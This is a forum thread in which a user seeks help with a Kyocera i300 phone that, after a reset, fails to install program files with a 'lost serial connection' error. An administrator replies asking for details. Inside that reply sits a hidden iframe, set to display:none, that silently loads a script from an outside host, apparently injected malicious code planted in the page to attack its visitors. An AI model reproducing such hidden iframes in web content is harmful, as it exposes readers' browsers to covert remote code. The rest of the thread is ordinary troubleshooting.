+ Reply to Thread

I know this is on the forum somewhere

I know I read on here somewhere about a setting on the i300 where you can force it to sync in a certain mode or a baud rate?? Not sure but I do remember you have to do something out of the ordinary and then it enables you to sync in a better 'mode'.
    Sorry for the lack of info but thats all I remember. I did it last time and then I was able to install files to the phone. After a reset Im having tons of problems intstalling files so I think this may be the cause.
    Any help would be appreciated.

Administrator
    welcome.

firstr off you need to tell us what problems you are having, error messages, etc. so we can diagnose it. what were you doing just prior to the errors? it may be a faulty program or hack causing your problems.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Problems Started since reset

I am not sure what the problem is. I lost everything on the phone after a reset and now the backups work but not for installation of new apps.

I can sync address book, date book and other normal files but when it comes to installing program files it always tells me the connection has been lost.

I have checked the settigngs on the computer and everything is good there.

I remember reading on here a while back about a setting where you hold down something and tap the stylus somewhere and then that brings up something you can set on the transfer so that the phone locks into a better mode.

I think thats how I got it to work last time but the phone has worked fine for almost a year now and I can remeber what I did to set it up the right way.

more info

After several hours of experimentation here is what I have found.

Time of the connection is not a problem (lengthy addressbook or to do list will sync)

After about 45sec
    Any instal of a PRC file gives me the error "lost serial connection.."

and no matter what I try its only when trying to install apps.

Im trying to install Album to go or Eudora or anything and none of them wil install.

I can transfer Image files just fine but not the apps...so my problem has somethign to do with actual software install not just file transfer if there is a difference to the serial connection.

Any help is much appreciated.